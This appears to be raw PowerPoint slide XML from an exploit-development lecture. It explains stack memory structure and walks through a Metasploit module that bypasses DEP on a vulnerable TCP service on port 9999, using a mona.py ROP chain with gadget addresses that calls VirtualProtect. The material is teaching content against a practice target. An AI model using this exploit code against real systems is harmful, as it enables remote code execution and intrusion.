        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="411137" y="1219008"/>
            <a:ext cx="5656752" cy="2065368"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE49B7AC-F5E3-2F9F-2144-36000BF31924}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="632156" y="3505008"/>
            <a:ext cx="5463844" cy="2335638"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1705480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45F57D7-4261-CBD0-9706-EB9D079EEBCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1"/>
            <a:ext cx="12191999" cy="646330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We have a complete </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>create_rop_chain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> function in the rop_chains.txt file for Metasploit. We merely need to copy this function to our exploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Writing the Metasploit exploit module for DEP bypass</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" u="sng"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We will write the DEP bypass exploit for the same vulnerable application in which we exploited the stack overflow vulnerability, and the exploit failed when DEP was enabled. The application runs on TCP port 9999. So, let's quickly build a module and try</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>bypassing DEP on the same application:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>MetasploitModule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>::Exploit::Remote</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Rank = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>NormalRanking</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include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>::Exploit::Remote::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>def initialize(info = {})</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>super(update_info(info,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>'Name' =&gt; 'DEP Bypass Exploit',</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>'Description' =&gt; %q{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>DEP Bypass Using ROP Chains Example Module</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'Platform' =&gt; 'win',</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>'Author' =&gt;</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Nipun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Jaswal</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'Payload' =&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>{'space' =&gt; 312,</a:t>
            </a:r>
          </a:p>
          <a:p>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BadChars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>' =&gt; "\x00",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="16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645427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FC423E-0362-111D-5E3F-2F9CEDB71F20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="6740307"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Stack Memory Structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The memory stack is a part in the memory assigned to an application or program for its execution. It is responsible for holding the local data, parametric values and return addresses during the execution of the application or program. It follows the Last In, First Out (LIFO) method of memory storage, i.e. the instruction last stored (PUSH) on the stack gets executed first (POP).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The stack is composed of four main components: the ESP (Extended Stack Pointer), the EBP (Extended Base Pointer), the EIP (Extended Instruction Pointer) and the Buffer Space. The diagrammatic layout of a memory stack is shown below:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27C2EB9A-9EB7-5607-E992-2357585744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0255" y="1945199"/>
            <a:ext cx="8970231" cy="3739782"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1815683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4F047B-1AAD-25B3-43DD-A9F5558F371A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="7263527"/>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'Targets' =&gt;</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['Windows 7 Professional',{ 'Offset' =&gt; 2006}]</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DisclosureDate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>' =&gt; 'Mar 4 2018'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>register_options</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Opt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>::RPORT(9999)</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end</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>create_rop_chain</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rop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> chain generated with mona.py - www.corelan.be</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>rop_gadgets</a:t>
            </a:r>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0x77dfb7e4, # POP ECX # RETN [RPCRT4.dll]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0x6250609c, # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> to &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>VirtualProtect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>() [IAT essfunc.dll]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0x76a5fd52, # MOV ESI,DWORD PTR DS:[ECX] # ADD DH,DH # RETN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>[MSCTF.dll]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0x766a70d7, # POP EBP # RETN [USP10.dll]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0x625011bb, # &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>jmp</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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> [essfunc.dll]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0x76a5fd52, # MOV ESI,DWORD PTR DS:[ECX] # ADD DH,DH # RETN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>[MSCTF.dll]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0x766a70d7, # POP EBP # RETN [USP10.dll]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0x625011bb, # &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>jmp</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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> [essfunc.dll]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0x777f557c, # POP EAX # RETN [msvcrt.dll]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0xfffffdff, # Value to negate, will become 0x00000201</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0x765e4802, # NEG EAX # RETN [user32.dll]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3711389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031FF8-FC98-1F5A-AD3D-185D556DF126}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-18662"/>
            <a:ext cx="12192000" cy="717119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0x76a5f9f1, # XCHG EAX,EBX # RETN [MSCTF.dll]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0x7779f5d4, # POP EAX # RETN [msvcrt.dll]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0xffffffc0, # Value to negate, will become 0x00000040</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0x765e4802, # NEG EAX # RETN [user32.dll]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0x76386fc0, # XCHG EAX,EDX # RETN [kernel32.dll]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
